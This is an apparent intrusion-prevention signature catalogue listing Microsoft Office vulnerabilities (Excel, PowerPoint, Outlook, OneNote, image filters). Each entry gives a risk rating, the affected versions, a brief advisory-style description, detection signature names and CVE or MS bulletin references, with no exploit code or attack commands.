First detected in: sgpkg-ips-1210-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel; Microsoft Office
Type: Malfunction
Description: A code execution vulnerability has been reported in Excel component of Microsoft Office. The vulnerabilities are due to improper handling of objects in memory. A remote attacker could exploit this vulnerability by enticing a user to open a maliciously crafted file. Successful exploitation, in the worst case, could lead to arbitrary code execution in the context of the user.
Situation: File-Text_Microsoft-Office-Excel-WorksheetOptions-Use-After-Free
References:
CVE-2019-1448
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1448
Back to top

Microsoft-Office-Excel-Xlsx-File-Parsing-Code-Execution

About this vulnerability: A vulnerability in Microsoft Office Compatibility Pack
Risk: Moderate
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Excel
Type: Malfunction
Description: A code execution vulnerability exists in Microsoft Office Excel. The vulnerability is due to improper handling of the ZIP header in an XLSX file when decompressing certain XML elements. This vulnerability may be exploited by remote attackers to execute arbitrary code on the target machine by enticing a user into opening a specially crafted Excel XLSX document. In attack scenarios where code execution is successful the behaviour of the target machine would depend entirely on the intention of the injected code, which would run within the security context of the logged on user. In situations where code execution is not successful, the vulnerable application may terminate abnormally, leading to a denial of service condition.
Situation: File-Zip_Microsoft-Office-Excel-Xlsx-File-Parsing-Code-Execution
References:
CVE-2010-0263
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0263
MS10-017
http://technet.microsoft.com/security/bulletin/MS10-017
Back to top

Microsoft-Office-File-Modification-Password-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-699-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: A use-after-free vulnerability exists in Microsoft Office 2007. The vulnerability is due to problematic code that parses Office documents with modification password protection. A remote attacker could exploit this vulnerability by enticing a user to open a crafted Office document. Successful exploitation could result in arbitrary code execution with the privileges of the currently logged on user.
Situation: File-OLE_Microsoft-Office-File-Modification-Password-Usage
References:
CVE-2015-1683
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1683
MS15-046
http://technet.microsoft.com/security/bulletin/MS15-046
Back to top

Microsoft-Office-FlashPix-Converter-Buffer-Overflow-CVE-2010-3951

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-363-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office XP
Type: Malfunction
Description: There is a vulnerability in Microsoft Office.
Situation: HTTP_SS-Microsoft-Office-FlashPix-Converter-Buffer-Overflow-CVE-2010-3951
File-OLE_Microsoft-Office-FlashPix-Converter-Buffer-Overflow-CVE-2010-3951
References:
CVE-2010-3951
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3951
MS10-105
http://technet.microsoft.com/security/bulletin/MS10-105
Back to top

Microsoft-Office-Gdiplus-EMF-File-Handling-Infinite-Loop

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-454-4333
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Infinite Loop
Description: There is a memory corruption vulnerability Microsoft Windows Graphics Device Interface (GDI+). The vulnerability is due to improper sanitization while handling EMF data embedded in Office files. A remote, unauthenticated attacker could exploit this vulnerability by enticing a user to open or view a specially crafted Microsoft Office file. Successful exploitation could result in arbitrary code execution in the context of the currently logged-in user.
Situation: File-OLE_Microsoft-Office-Gdiplus-EMF-File-Handling-Infinite-Loop
References:
CVE-2012-0167
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0167
BID-53351
http://www.securityfocus.com/bid/53351
OSVDB-81719
http://www.osvdb.org/81719
MS12-034
http://technet.microsoft.com/security/bulletin/MS12-034
Back to top

Microsoft-Office-Groove-Insecure-Library-Loading

About this vulnerability: A vulnerability in Microsoft Office Groove
Risk: High
First detected in: sgpkg-ips-382-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Groove 2007
Type: Malfunction
Description: A code execution vulnerability exists in Microsoft Office Groove. The vulnerability is due to a design weakness while loading libraries, such as mso.dll and GroovePerfmon.dll. Remote attackers could exploit this vulnerability by enticing target users to open a VCG or GTA file from a remote WebDAV or an SMB share. Successful exploitation of this vulnerability would result in loading the attacker-controlled library and execution of arbitrary code with the privileges of the affected application.
Situation: HTTP_CSU-Microsoft-Office-Groove-Insecure-Library-Loading
SMB-TCP_Microsoft-Office-Groove-Insecure-Library-Loading
References:
CVE-2010-3146
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3146
BID-42695
http://www.securityfocus.com/bid/42695
MS11-016
http://technet.microsoft.com/security/bulletin/MS11-016
Back to top

Microsoft-Office-Image-Filter-Crafted-BMP-Header-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office; Microsoft Works
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Image Filter shipped with Microsoft Office. The vulnerability is due to improper validation of the number of used colors in BMP header. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to open a malicious BMP image with the affected application, causing the execution of arbitrary code in the security context of the current user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, the affected application will terminate resulting in the loss of any unsaved data from the current session.
Situation: File-Binary_Microsoft-Office-Image-Filter-Crafted-BMP-Header-Buffer-Overflow
References:
CVE-2008-3020
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3020
BID-30599
http://www.securityfocus.com/bid/30599
MS08-044
http://technet.microsoft.com/security/bulletin/MS08-044
Back to top

Microsoft-Office-Information-Disclosure-Vulnerability-CVE-2016-3234

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-770-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office 2007; Microsoft Office 2010; Microsoft Office SharePoint Server 2010; Microsoft Sharepoint Server 2013; Microsoft Office Web Apps 2010; Microsoft Office Web Apps 2013
Type: Malfunction
Description: There exists an information disclosure vulnerability in Microsoft Office.
Situation: File-RTF_Microsoft-Office-Information-Disclosure-Vulnerability-CVE-2016-3234
References:
CVE-2016-3234
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3234
MS16-070
http://technet.microsoft.com/security/bulletin/MS16-070
Back to top

Microsoft-Office-Insecure-Library-Loading

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: An insecure library loading vulnerability has been reported in Microsoft Office.
Situation: HTTP_CSU-Insecure-Microsoft-Library-Loading
SMB-TCP_CHS-Microsoft-Office-Insecure-Library-Loading
References:
CVE-2011-1980
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1980
MS11-073
http://technet.microsoft.com/security/bulletin/MS11-073
Back to top

Microsoft-Office-Insecure-Library-Loading-CVE-2010-3337

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-353-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office 2007; Microsoft Office 2010
Type: Input Validation
Description: There is a vulnerability in Microsoft Office.
Situation: HTTP_CS-Microsoft-Windows-DLL-Hijack-Vulnerability
References:
CVE-2010-3337
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3337
MS10-087
http://technet.microsoft.com/security/bulletin/MS10-087
Back to top

Microsoft-Office-Jet-Engine-MDB-File-Parsing-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Jet Engine (msjet40.dll)
Risk: Moderate
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Jet Engine; Microsoft Office
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Microsoft Jet Engine. The flaw is due to boundary errors when processing MDB database files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted MDB file. Successful exploitation may lead to arbitrary code execution in the security context of the logged in user.
Situation: HTTP_SS-Microsoft-Office-Jet-Engine-MDB-File-Parsing-Buffer-Overflow
File-Binary_Microsoft-Office-Jet-Engine-MDB-File-Parsing-Buffer-Overflow
References:
CVE-2007-6026
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6026
BID-26468
http://www.securityfocus.com/bid/26468
MS08-028
http://technet.microsoft.com/security/bulletin/MS08-028
Back to top

Microsoft-Office-Malformed-Routing-Slip-Code-Execution

About this vulnerability: A vulnerability in Microsoft Word
Risk: Moderate
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Word; Microsoft Excel; Microsoft Outlook; Microsoft PowerPoint; Microsoft Office
Type: Malfunction
Description: A vulnerability exists in Microsoft Office components when processing documents which include malformed Routing Slip records. This vulnerability may be exploited by supplying a malicious document to a vulnerable target host and enticing a user to open the file. An attacker may exploit this vulnerability to inject and execute arbitrary code into the vulnerable application process. In an attack case where code injection is not successful, all instances of the vulnerable Microsoft Office application will terminate. This can potentially lead to a loss of data. In a more sophisticated attack where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user.
Situation: File-OLE_Microsoft-Office-Malformed-Routing-Slip-Code-Execution
References:
CVE-2006-0009
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0009
BID-17000
http://www.securityfocus.com/bid/17000
OSVDB-23903
http://www.osvdb.org/23903
MS06-012
http://technet.microsoft.com/security/bulletin/MS06-012
Back to top

Microsoft-Office-Malicious-OLE-File

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: A malicious OLE file was detected
Situation: File-OLE_Microsoft-Office-Malicious-OLE-File
Back to top

Microsoft-Office-Memory-Corruption-CVE-2015-0086

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Office
Type: Malfunction
Description: A vulnerability in Microsoft Office
Situation: File-RTF_Microsoft-Office-Memory-Corruption-CVE-2015-0086
References:
CVE-2015-0086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0086
MS15-022
http://technet.microsoft.com/security/bulletin/MS15-022
Back to top

Microsoft-Office-Memory-Corruption-CVE-2016-0022

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-730-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Office
Type: Input Validation
Description: A vulnerability in Microsoft Office
Situation: File-RTF_Microsoft-Office-Memory-Corruption-CVE-2016-0022
References:
CVE-2016-0022
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0022
MS16-015
http://technet.microsoft.com/security/bulletin/MS16-015
Back to top

Microsoft-Office-Memory-Corruption-CVE-2016-0052

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-730-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Office
Type: Input Validation
Description: A vulnerability in Microsoft Office
Situation: File-RTF_Microsoft-Office-Memory-Corruption-CVE-2016-0052
References:
CVE-2016-0052
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0052
MS16-015
http://technet.microsoft.com/security/bulletin/MS16-015
Back to top

Microsoft-Office-Memory-Corruption-CVE-2016-0053

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-730-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Office
Type: Input Validation
Description: A vulnerability in Microsoft Office
Situation: File-RTF_Microsoft-Office-Memory-Corruption-CVE-2016-0053
References:
CVE-2016-0053
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0053
MS16-015
http://technet.microsoft.com/security/bulletin/MS16-015
Back to top

Microsoft-Office-Memory-Corruption-CVE-2016-3280

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-777-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Office
Type: Buffer Overflow
Description: A vulnerability in Microsoft Office
Situation: File-RTF_Microsoft-Office-Memory-Corruption-CVE-2016-3280
References:
CVE-2016-3280
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3280
MS16-088
http://technet.microsoft.com/security/bulletin/MS16-088
Back to top

Microsoft-Office-Memory-Corruption-Vulnerability-CVE-2015-2558

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-695-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office 2007; Microsoft Office 2010; Microsoft Office 2013; Microsoft Office 2016
Type: Malfunction
Description: There is a remote code execution in multiple version of Microsoft Office.
Situation: File-TextId_Microsoft-Office-Memory-Corruption-Vulnerability-CVE-2015-2558
References:
CVE-2015-2558
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2558
MS15-110
http://technet.microsoft.com/security/bulletin/MS15-110
Back to top

Microsoft-Office-MSO-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-281-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office XP; Microsoft Office 2004
Type: Input Validation
Description: There is a buffer overflow vulnerability in Microsoft Office.
Situation: HTTP_SS-Microsoft-Office-MSO-Buffer-Overflow
File-OLE_Microsoft-Office-MSO-Buffer-Overflow
References:
CVE-2010-0243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0243
MS10-003
http://technet.microsoft.com/security/bulletin/MS10-003
Back to top

Microsoft-Office-MSO-Large-SPID-Read-AV-CVE-2010-3336

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-353-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office XP; Microsoft Office 2004; Microsoft Office 2008
Type: Input Validation
Description: There is a vulnerability in Microsoft Office.
Situation: HTTP_SS-Microsoft-Office-MSO-Large-SPID-Read-AV-CVE-2010-3336
File-OLE_Microsoft-Office-MSO-Large-SPID-Read-AV-CVE-2010-3336
References:
CVE-2010-3336
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3336
BID-44660
http://www.securityfocus.com/bid/44660
MS10-087
http://technet.microsoft.com/security/bulletin/MS10-087
Back to top

Microsoft-Office-Oleobject-Type-Confusion

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-1011-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: Improper parsing of XML Office files causes a tpye confusion vulnerability in Microsoft Office. A successful exploit allows an attacker to run arbitrary code on the target system.
Situation: File-TextId_Microsoft-Office-Oleobject-Type-Confusion
References:
CVE-2017-11826
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11826
Back to top

Microsoft-Office-OneNote-Url-Validation-Error-Vulnerability

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-167-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office OneNote; Microsoft Office XP; Microsoft Office 2003
Type: Input Validation
Description: There is a remote code execution vulnerability in Microsoft Office OneNote. The vulnerability lies in the way OneNote handles specially-crafted URLs using the OneNote protocol handler. As a result of this vulnerability, a remote attacker can download arbitrary files on a victim's system without requiring permission. Successful exploitation of this vulnerability may lead to arbitrary code execution on the target host with the privileges of the current user.
Situation: HTTP_SS-Microsoft-Office-OneNote-Url-Validation-Error
File-Text_Microsoft-Office-OneNote-Url-Validation-Error
References:
CVE-2008-3007
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3007
BID-31067
http://www.securityfocus.com/bid/31067
MS08-055
http://technet.microsoft.com/security/bulletin/MS08-055
Back to top

Microsoft-Office-Outlook-CVE-2018-8161-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-1082-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: Incorrect parsing of HTML vauses a use after free vulnerability in Microsoft Office. A successful exploitation could result in a remote attacker being able to execute arbitrary code with the privileges of the application.
Situation: File-Text_Microsoft-Office-Outlook-CVE-2018-8161-Use-After-Free
References:
CVE-2018-8161
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8161
Back to top

Microsoft-Office-Outlook-Mailto-URI-Handling-Code-Execution

About this vulnerability: A vulnerability in Microsoft Office Outlook
Risk: Moderate
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Outlook; Microsoft Office
Type: Input Validation
Description: A vulnerability exists in the way Microsoft Office Outlook handles mailto URIs. Specifically, the vulnerability is a result of lack of proper URI filtering. When exploited successfully, the vulnerability can lead to arbitrary command execution in the security context of the currently logged in user.
Situation: HTTP_SS-Microsoft-Office-Outlook-Mailto-URI-Handling-Code-Execution
File-Text_Microsoft-Office-Outlook-Mailto-URI-Handling-Code-Execution
References:
CVE-2008-0110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0110
BID-28147
http://www.securityfocus.com/bid/28147
MS08-015
http://technet.microsoft.com/security/bulletin/MS08-015
Back to top

Microsoft-Office-Pict-Filter-Invalid-Length-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office; Microsoft Project; Microsoft Works
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Microsoft Office PICT Filter. The vulnerability is due to an error in handling a PICT image file. Remote unauthenticated attackers could exploit this vulnerability by persuading a target user to open a specially crafted PICT file. Successful exploitation would cause a memory corruption that may lead to arbitrary code execution in the security context of the logged in user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, the affected application will terminate resulting in the loss of any unsaved data from the current session.
Situation: File-Binary_Microsoft-Office-Pict-Filter-Invalid-Length-Memory-Corruption
References:
CVE-2008-3018
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3018
BID-30597
http://www.securityfocus.com/bid/30597
MS08-044
http://technet.microsoft.com/security/bulletin/MS08-044
Back to top

Microsoft-Office-Pict-Filter-Map-Structure-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office; Microsoft Project; Microsoft Works
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Microsoft Office PICT Filter. The vulnerability is due to an error in handling a PICT image file. Remote unauthenticated attackers could exploit this vulnerability by persuading a target user to open a specially crafted PICT file. Successful exploitation would cause a memory corruption that may lead to arbitrary code execution in the security context of the logged in user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, the affected application will terminate resulting in the loss of any unsaved data from the current session.
Situation: File-Binary_Microsoft-Office-Pict-Filter-Map-Structure-Memory-Corruption
References:
CVE-2008-3021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3021
BID-30598
http://www.securityfocus.com/bid/30598
MS08-044
http://technet.microsoft.com/security/bulletin/MS08-044
Back to top

Microsoft-Office-Pict-Image-Converter-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Office
Risk: Moderate
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office XP; Microsoft Office 2003; Microsoft Office Converter Pack
Type: Integer Overflow
Description: A buffer overflow vulnerability exists in Microsoft Office. The vulnerability is due to the way Office allocates a buffer size when handling PICT image files. An attacker can leverage this vulnerability by enticing a target user to open a malicious file. Successful exploitation would allow an attacker to execute arbitrary code in the security context of the logged in user. An unsuccessful attack could cause an abnormal termination of the affected product.
Situation: HTTP_SS-Microsoft-Office-Pict-Image-Converter-Integer-Overflow
File-Binary_Microsoft-Office-Pict-Image-Converter-Integer-Overflow
References:
CVE-2010-3946
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3946
BID-45273
http://www.securityfocus.com/bid/45273
MS10-105
http://technet.microsoft.com/security/bulletin/MS10-105
Back to top

Microsoft-Office-PowerPoint-Animation-Code-Execution-CVE-2010-2573

About this vulnerability: Code execution vulnerability in Microsoft PowerPoint
Risk: High
First detected in: sgpkg-ips-353-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Microsoft PowerPoint
Type: Malfunction
Description: There is a code execution vulnerability in Microsoft PowerPoint. By persuading a target user to open a malicious Microsoft PowerPoint file with a vulnerable version of the affected product, a remote attacker can execute arbitrary code with the privileges of the currently logged in user.
Situation: E-Mail_BS-Microsoft-Office-PowerPoint-Animation-Code-Execution-CVE-2010-2573
HTTP_SS-Microsoft-Office-PowerPoint-Animation-Code-Execution-CVE-2010-2573
File-OLE_Microsoft-Office-PowerPoint-Animation-Code-Execution-CVE-2010-2573
References:
CVE-2010-2573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2573
MS10-088
http://technet.microsoft.com/security/bulletin/MS10-088
Back to top

Microsoft-Office-PowerPoint-FB1h-Parsing-BOF-CVE-2010-2572

About this vulnerability: Code execution vulnerability in Microsoft PowerPoint
Risk: High
First detected in: sgpkg-ips-353-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Microsoft PowerPoint
Type: Malfunction
Description: There is a code execution vulnerability in Microsoft PowerPoint. By persuading a target user to open a malicious Microsoft PowerPoint file with a vulnerable version of the affected product, a remote attacker can execute arbitrary code with the privileges of the currently logged in user.
Situation: E-Mail_BS-Microsoft-Office-PowerPoint-FB1h-Parsing-BOF-CVE-2010-2572
HTTP_SS-Microsoft-Office-PowerPoint-FB1h-Parsing-BOF-CVE-2010-2572
File-OLE_Microsoft-Office-PowerPoint-FB1h-Parsing-BOF-CVE-2010-2572
References:
CVE-2010-2572
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2572
MS10-088
http://technet.microsoft.com/security/bulletin/MS10-088
Back to top

Microsoft-Office-PowerPoint-Invalid-Object-Reference-Code-Execution

About this vulnerability: A vulnerability in Microsoft Office PowerPoint
Risk: High
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft PowerPoint; Microsoft Office 2004; Microsoft Office
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Office PowerPoint. The flaw is due to accessing invalid object in malicious PowerPoint (PPT) documents. An attacker could exploit this vulnerability by persuading the target user to open a specially crafted PowerPoint document. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The injected code in such a case would execute within the security context of the logged in user. In an attack case where code injection is not successful, the affected application will terminate abnormally, potentially resulting in loss of unsaved data.
Situation: HTTP_SS-Microsoft-Office-PowerPoint-Invalid-Object-Reference-Code-Execution
File-OLE_Microsoft-Office-PowerPoint-Invalid-Object-Reference-Code-Execution
References:
CVE-2009-0556
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0556
BID-34351
http://www.securityfocus.com/bid/34351
OSVDB-53182
http://www.osvdb.org/53182
MS09-017
http://technet.microsoft.com/security/bulletin/MS09-017
Back to top

Microsoft-Office-PowerPoint-MS09-017

About this vulnerability: A vulnerability in Microsoft Office PowerPoint
Risk: Moderate
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft PowerPoint; Microsoft Office
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Microsoft PowerPoint. The flaw is due to a boundary error when processing crafted legacy PowerPoint (PPT) documents. An attacker could exploit this vulnerability by persuading the target user to open a specially crafted legacy PowerPoint document. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The injected code in such a case would execute within the security context of the logged in user. In an attack case where code injection is not successful, the affected application will terminate abnormally, potentially resulting in loss of unsaved data.
Situation: File-OLE_Microsoft-Office-PowerPoint-MS09-017
References:
CVE-2009-0220
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0220
BID-34833
http://www.securityfocus.com/bid/34833
OSVDB-54386
http://www.osvdb.org/54386
MS09-017
http://technet.microsoft.com/security/bulletin/MS09-017
Back to top

Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0029

About this vulnerability: Code execution vulnerability in Microsoft PowerPoint
Risk: High
First detected in: sgpkg-ips-284-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Microsoft PowerPoint
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Microsoft PowerPoint. By persuading a target user to open a maliciously named Microsoft PowerPoint file with a vulnerable version of the affected product, a remote attacker can execute arbitrary code with the privileges of the currently logged in user.
Situation: HTTP_CSU-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0029
HTTP_SHS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0029
References:
CVE-2010-0029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0029
MS10-004
http://technet.microsoft.com/security/bulletin/MS10-004
Back to top

Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0031

About this vulnerability: Code execution vulnerability in Microsoft PowerPoint
Risk: High
First detected in: sgpkg-ips-281-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Microsoft PowerPoint
Type: Malfunction
Description: There is a code execution vulnerability in Microsoft PowerPoint. By persuading a target user to open a malicious Microsoft PowerPoint file with a vulnerable version of the affected product, a remote attacker can execute arbitrary code with the privileges of the currently logged in user.
Situation: HTTP_SS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0031
E-Mail_BS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0031
File-OLE_Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0031
References:
CVE-2010-0031
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0031
MS10-004
http://technet.microsoft.com/security/bulletin/MS10-004
Back to top

Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0032

About this vulnerability: Code execution vulnerability in Microsoft PowerPoint
Risk: High
First detected in: sgpkg-ips-281-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Microsoft PowerPoint
Type: Malfunction
Description: There is a code execution vulnerability in Microsoft PowerPoint. By persuading a target user to open a malicious Microsoft PowerPoint file with a vulnerable version of the affected product, a remote attacker can execute arbitrary code with the privileges of the currently logged in user.
Situation: HTTP_SS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0032
E-Mail_BS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0032
File-OLE_Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0032
References:
CVE-2010-0032
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0032
MS10-004
http://technet.microsoft.com/security/bulletin/MS10-004
Back to top

Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0033

About this vulnerability: Code execution vulnerability in Microsoft PowerPoint
Risk: High
First detected in: sgpkg-ips-281-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Microsoft PowerPoint
Type: Malfunction
Description: There is a code execution vulnerability in Microsoft PowerPoint. By persuading a target user to open a malicious Microsoft PowerPoint file with a vulnerable version of the affected product, a remote attacker can execute arbitrary code with the privileges of the currently logged in user.
Situation: HTTP_SS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0033
E-Mail_BS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0033
File-OLE_Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0033
References:
CVE-2010-0033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0033
MS10-004
http://technet.microsoft.com/security/bulletin/MS10-004
Back to top

Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0034

About this vulnerability: Code execution vulnerability in Microsoft PowerPoint
Risk: High
First detected in: sgpkg-ips-282-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Microsoft PowerPoint
Type: Malfunction
Description: There is a code execution vulnerability in Microsoft PowerPoint. By persuading a target user to open a malicious Microsoft PowerPoint file with a vulnerable version of the affected product, a remote attacker can execute arbitrary code with the privileges of the currently logged in user.
Situation: HTTP_SS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0034
E-Mail_BS-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0034
File-OLE_Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0034
References:
CVE-2010-0034
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0034
MS10-004
http://technet.microsoft.com/security/bulletin/MS10-004
Back to top

